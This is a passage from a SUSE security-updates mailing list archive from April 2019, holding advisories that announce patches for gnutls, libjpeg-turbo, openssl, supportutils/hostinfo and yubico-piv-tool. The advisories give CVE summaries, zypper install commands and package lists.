15: zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-1110=1 Package List: - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 x86_64): ovmf-2017+git1510945757.b2662641d5-5.22.1 ovmf-tools-2017+git1510945757.b2662641d5-5.22.1 - SUSE Linux Enterprise Module for Server Applications 15 (noarch): qemu-ovmf-x86_64-2017+git1510945757.b2662641d5-5.22.1 qemu-uefi-aarch64-2017+git1510945757.b2662641d5-5.22.1 References: https://www.suse.com/security/cve/CVE-2019-0161.html https://bugzilla.suse.com/1131361 From sle-security-updates at lists.suse.com Tue Apr 30 13:11:11 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 21:11:11 +0200 (CEST) Subject: SUSE-SU-2019:1121-1: important: Security update for gnutls Message-ID: <20190430191111.28865F3D3@maintenance.suse.de> SUSE Security Update: Security update for gnutls ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1121-1 Rating: important References: #1118087 #1130681 #1130682 Cross-References: CVE-2018-16868 CVE-2019-3829 CVE-2019-3836 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Desktop Applications 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for gnutls fixes to version 3.6.7 the following issues: Security issued fixed: - CVE-2019-3836: Fixed an invalid pointer access via malformed TLS1.3 async messages (bsc#1130682). - CVE-2019-3829: Fixed a double free vulnerability in the certificate verification API (bsc#1130681). - CVE-2018-16868: Fixed Bleichenbacher-like side channel leakage in PKCS#1 v1.5 verification and padding oracle verification (bsc#1118087) Non-security issue fixed: - Update gnutls to support TLS 1.3 (fate#327114) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1121=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-1121=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-1121=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): gnutls-debuginfo-3.6.7-6.8.1 gnutls-debugsource-3.6.7-6.8.1 gnutls-guile-3.6.7-6.8.1 gnutls-guile-debuginfo-3.6.7-6.8.1 - SUSE Linux Enterprise Module for Desktop Applications 15 (x86_64): gnutls-debugsource-3.6.7-6.8.1 libgnutls30-32bit-3.6.7-6.8.1 libgnutls30-32bit-debuginfo-3.6.7-6.8.1 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): gnutls-3.6.7-6.8.1 gnutls-debuginfo-3.6.7-6.8.1 gnutls-debugsource-3.6.7-6.8.1 libgnutls-devel-3.6.7-6.8.1 libgnutls30-3.6.7-6.8.1 libgnutls30-debuginfo-3.6.7-6.8.1 libgnutlsxx-devel-3.6.7-6.8.1 libgnutlsxx28-3.6.7-6.8.1 libgnutlsxx28-debuginfo-3.6.7-6.8.1 - SUSE Linux Enterprise Module for Basesystem 15 (x86_64): libgnutls30-32bit-3.6.7-6.8.1 libgnutls30-32bit-debuginfo-3.6.7-6.8.1 References: https://www.suse.com/security/cve/CVE-2018-16868.html https://www.suse.com/security/cve/CVE-2019-3829.html https://www.suse.com/security/cve/CVE-2019-3836.html https://bugzilla.suse.com/1118087 https://bugzilla.suse.com/1130681 https://bugzilla.suse.com/1130682 From sle-security-updates at lists.suse.com Tue Apr 30 13:12:52 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 21:12:52 +0200 (CEST) Subject: SUSE-SU-2019:1111-1: moderate: Security update for libjpeg-turbo Message-ID: <20190430191252.09FA7F3D3@maintenance.suse.de> SUSE Security Update: Security update for libjpeg-turbo ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1111-1 Rating: moderate References: #1096209 #1098155 #1128712 Cross-References: CVE-2018-1152 CVE-2018-11813 CVE-2018-14498 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for libjpeg-turbo fixes the following issues: The following security vulnerabilities were addressed: - CVE-2018-14498: Fixed a heap-based buffer over read in get_8bit_row function which could allow to an attacker to cause denial of service (bsc#1128712). - CVE-2018-11813: Fixed the end-of-file mishandling in read_pixel in rdtarga.c, which allowed remote attackers to cause a denial-of-service via crafted JPG files due to a large loop (bsc#1096209) - CVE-2018-1152: Fixed a denial of service in start_input_bmp() rdbmp.c caused by a divide by zero when processing a crafted BMP image (bsc#1098155) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1111=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1111=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1111=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1111=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1111=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1111=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): libjpeg62-devel-62.2.0-31.14.2 libjpeg8-devel-8.1.2-31.14.2 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): libjpeg62-devel-62.2.0-31.14.2 libjpeg8-devel-8.1.2-31.14.2 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libjpeg-turbo-1.5.3-31.14.2 libjpeg-turbo-debuginfo-1.5.3-31.14.2 libjpeg-turbo-debugsource-1.5.3-31.14.2 libjpeg62-62.2.0-31.14.2 libjpeg62-debuginfo-62.2.0-31.14.2 libjpeg62-turbo-1.5.3-31.14.2 libjpeg62-turbo-debugsource-1.5.3-31.14.2 libjpeg8-8.1.2-31.14.2 libjpeg8-debuginfo-8.1.2-31.14.2 libturbojpeg0-8.1.2-31.14.2 libturbojpeg0-debuginfo-8.1.2-31.14.2 - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64): libjpeg62-32bit-62.2.0-31.14.2 libjpeg62-debuginfo-32bit-62.2.0-31.14.2 libjpeg8-32bit-8.1.2-31.14.2 libjpeg8-debuginfo-32bit-8.1.2-31.14.2 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): libjpeg-turbo-1.5.3-31.14.2 libjpeg-turbo-debuginfo-1.5.3-31.14.2 libjpeg-turbo-debugsource-1.5.3-31.14.2 libjpeg62-62.2.0-31.14.2 libjpeg62-debuginfo-62.2.0-31.14.2 libjpeg62-turbo-1.5.3-31.14.2 libjpeg62-turbo-debugsource-1.5.3-31.14.2 libjpeg8-8.1.2-31.14.2 libjpeg8-debuginfo-8.1.2-31.14.2 libturbojpeg0-8.1.2-31.14.2 libturbojpeg0-debuginfo-8.1.2-31.14.2 - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64): libjpeg62-32bit-62.2.0-31.14.2 libjpeg62-debuginfo-32bit-62.2.0-31.14.2 libjpeg8-32bit-8.1.2-31.14.2 libjpeg8-debuginfo-32bit-8.1.2-31.14.2 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): libjpeg-turbo-1.5.3-31.14.2 libjpeg-turbo-debuginfo-1.5.3-31.14.2 libjpeg-turbo-debugsource-1.5.3-31.14.2 libjpeg62-32bit-62.2.0-31.14.2 libjpeg62-62.2.0-31.14.2 libjpeg62-debuginfo-32bit-62.2.0-31.14.2 libjpeg62-debuginfo-62.2.0-31.14.2 libjpeg62-turbo-1.5.3-31.14.2 libjpeg62-turbo-debugsource-1.5.3-31.14.2 libjpeg8-32bit-8.1.2-31.14.2 libjpeg8-8.1.2-31.14.2 libjpeg8-debuginfo-32bit-8.1.2-31.14.2 libjpeg8-debuginfo-8.1.2-31.14.2 libturbojpeg0-8.1.2-31.14.2 libturbojpeg0-debuginfo-8.1.2-31.14.2 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): libjpeg-turbo-1.5.3-31.14.2 libjpeg-turbo-debuginfo-1.5.3-31.14.2 libjpeg-turbo-debugsource-1.5.3-31.14.2 libjpeg62-32bit-62.2.0-31.14.2 libjpeg62-62.2.0-31.14.2 libjpeg62-debuginfo-32bit-62.2.0-31.14.2 libjpeg62-debuginfo-62.2.0-31.14.2 libjpeg62-turbo-1.5.3-31.14.2 libjpeg62-turbo-debugsource-1.5.3-31.14.2 libjpeg8-32bit-8.1.2-31.14.2 libjpeg8-8.1.2-31.14.2 libjpeg8-debuginfo-32bit-8.1.2-31.14.2 libjpeg8-debuginfo-8.1.2-31.14.2 libturbojpeg0-8.1.2-31.14.2 libturbojpeg0-debuginfo-8.1.2-31.14.2 References: https://www.suse.com/security/cve/CVE-2018-1152.html https://www.suse.com/security/cve/CVE-2018-11813.html https://www.suse.com/security/cve/CVE-2018-14498.html https://bugzilla.suse.com/1096209 https://bugzilla.suse.com/1098155 https://bugzilla.suse.com/1128712 From sle-security-updates at lists.suse.com Tue Apr 30 13:15:51 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 21:15:51 +0200 (CEST) Subject: SUSE-SU-2019:1124-1: moderate: Security update for openssl Message-ID: <20190430191551.EAE8CF3D3@maintenance.suse.de> SUSE Security Update: Security update for openssl ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1124-1 Rating: moderate References: #1117951 #1131291 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP1-LTSS ______________________________________________________________________________ An update that contains security fixes can now be installed. Description: This update for openssl fixes the following issues: Security issues fixed: - Mitigation for cache side channel attacks: The 9 Lives of Bleichenbacher's CAT (bsc#1117951) - Reject invalid eliptic curve point coordinates (bsc#1131291) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1124=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1124=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libopenssl1_0_0-1.0.1i-54.23.1 libopenssl1_0_0-32bit-1.0.1i-54.23.1 libopenssl1_0_0-debuginfo-1.0.1i-54.23.1 libopenssl1_0_0-debuginfo-32bit-1.0.1i-54.23.1 libopenssl1_0_0-hmac-1.0.1i-54.23.1 libopenssl1_0_0-hmac-32bit-1.0.1i-54.23.1 openssl-1.0.1i-54.23.1 openssl-debuginfo-1.0.1i-54.23.1 openssl-debugsource-1.0.1i-54.23.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch): openssl-doc-1.0.1i-54.23.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): libopenssl1_0_0-1.0.1i-54.23.1 libopenssl1_0_0-debuginfo-1.0.1i-54.23.1 libopenssl1_0_0-hmac-1.0.1i-54.23.1 openssl-1.0.1i-54.23.1 openssl-debuginfo-1.0.1i-54.23.1 openssl-debugsource-1.0.1i-54.23.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (s390x x86_64): libopenssl1_0_0-32bit-1.0.1i-54.23.1 libopenssl1_0_0-debuginfo-32bit-1.0.1i-54.23.1 libopenssl1_0_0-hmac-32bit-1.0.1i-54.23.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (noarch): openssl-doc-1.0.1i-54.23.1 References: https://bugzilla.suse.com/1117951 https://bugzilla.suse.com/1131291 From sle-security-updates at lists.suse.com Tue Apr 30 13:16:38 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 21:16:38 +0200 (CEST) Subject: SUSE-SU-2019:1122-1: important: Security update for hostinfo, supportutils Message-ID: <20190430191638.9B815F3D3@maintenance.suse.de> SUSE Security Update: Security update for hostinfo, supportutils ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1122-1 Rating: important References: #1054979 #1099498 #1115245 #1117751 #1117776 #1118460 #1118462 #1118463 #1125623 #1125666 Cross-References: CVE-2018-19636 CVE-2018-19637 CVE-2018-19638 CVE-2018-19639 CVE-2018-19640 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 SUSE CaaS Platform ALL ______________________________________________________________________________ An update that solves 5 vulnerabilities and has 5 fixes is now available. Description: This update for hostinfo, supportutils fixes the following issues: Security issues fixed for supportutils: - CVE-2018-19640: Fixed an issue where users could kill arbitrary processes (bsc#1118463). - CVE-2018-19638: Fixed an issue where users could overwrite arbitrary log files (bsc#1118460). - CVE-2018-19639: Fixed a code execution if run with -v (bsc#1118462). - CVE-2018-19637: Fixed an issue where static temporary filename could allow overwriting of files (bsc#1117776). - CVE-2018-19636: Fixed a local root exploit via inclusion of attacker controlled shell script (bsc#1117751). Other issues fixed for supportutils: - Fixed invalid exit code commands (bsc#1125666) - SUSE separation in supportconfig (bsc#1125623) - Clarified supportconfig(8) -x option (bsc#1115245) - supportconfig: 3.0.127 - btrfs filesystem usage - List products.d - Dump lsof errors - Added ha commands for corosync - Dumped find errors in ib_info Issues fixed in hostinfo: - Removed extra kernel install dates (bsc#1099498) - Resolved network bond issue (bsc#1054979) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-1122=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-1122=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1122=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1122=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-1122=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-1122=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1122=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-1122=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1122=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1122=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-1122=1 - SUSE CaaS Platform ALL: To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way. Package List: - SUSE OpenStack Cloud 7 (noarch): hostinfo-1.0.1-19.5.1 supportutils-3.0-95.21.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (noarch): hostinfo-1.0.1-19.5.1 supportutils-3.0-95.21.1 - SUSE Linux Enterprise Server 12-SP4 (noarch): hostinfo-1.0.1-19.5.1 supportutils-3.0-95.21.1 - SUSE Linux Enterprise Server 12-SP3 (noarch): hostinfo-1.0.1-19.5.1 supportutils-3.0-95.21.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (noarch): hostinfo-1.0.1-19.5.1 supportutils-3.0-95.21.1 - SUSE Linux Enterprise Server 12-SP2-BCL (noarch): hostinfo-1.0.1-19.5.1 supportutils-3.0-95.21.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (noarch): hostinfo-1.0.1-19.5.1 supportutils-3.0-95.21.1 - SUSE Linux Enterprise Server 12-LTSS (noarch): hostinfo-1.0.1-19.5.1 supportutils-3.0-95.21.1 - SUSE Linux Enterprise Desktop 12-SP4 (noarch): supportutils-3.0-95.21.1 - SUSE Linux Enterprise Desktop 12-SP3 (noarch): supportutils-3.0-95.21.1 - SUSE Enterprise Storage 4 (noarch): hostinfo-1.0.1-19.5.1 supportutils-3.0-95.21.1 - SUSE CaaS Platform ALL (noarch): supportutils-3.0-95.21.1 References: https://www.suse.com/security/cve/CVE-2018-19636.html https://www.suse.com/security/cve/CVE-2018-19637.html https://www.suse.com/security/cve/CVE-2018-19638.html https://www.suse.com/security/cve/CVE-2018-19639.html https://www.suse.com/security/cve/CVE-2018-19640.html https://bugzilla.suse.com/1054979 https://bugzilla.suse.com/1099498 https://bugzilla.suse.com/1115245 https://bugzilla.suse.com/1117751 https://bugzilla.suse.com/1117776 https://bugzilla.suse.com/1118460 https://bugzilla.suse.com/1118462 https://bugzilla.suse.com/1118463 https://bugzilla.suse.com/1125623 https://bugzilla.suse.com/1125666 From sle-security-updates at lists.suse.com Tue Apr 30 13:18:31 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 21:18:31 +0200 (CEST) Subject: SUSE-SU-2019:1123-1: Security update for yubico-piv-tool Message-ID: <20190430191831.30583F3DA@maintenance.suse.de> SUSE Security Update: Security update for yubico-piv-tool ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1123-1 Rating: low References: #1104809 #1104811 Cross-References: CVE-2018-14779 CVE-2018-14780 Affected Products: SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for yubico-piv-tool fixes the following issues: Security issues fixed: - Fixed an buffer overflow and an out of bounds memory read in ykpiv_transfer_data(), which could be triggered by a malicious token. (CVE-2018-14779, bsc#1104809, YSA-2018-03) - Fixed an buffer overflow and an out of bounds memory read in _ykpiv_fetch_object(), which could be triggered by a malicious token. (CVE-2018-14780, bsc#1104811, YSA-2018-03) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-1123=1 Package List: - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libykcs11-1-1.5.0-3.3.33 libykcs11-1-debuginfo-1.5.0-3.3.33 libykcs11-devel-1.5.0-3.3.33 libykpiv-devel-1.5.0-3.3.33 libykpiv1-1.5.0-3.3.33 libykpiv1-debuginfo-1.5.0-3.3.33 yubico-piv-tool-1.5.0-3.3.33 yubico-piv-tool-debuginfo-1.5.0-3.3.33 yubico-piv-tool-debugsource-1.5.0-3.3.33 References: https://www.suse.com/security/cve/CVE-2018-14779.html https://www.suse.com/security/cve/CVE-2018-14780.html https://bugzilla.suse.com/1104809 https://bugzilla.suse.com/1104811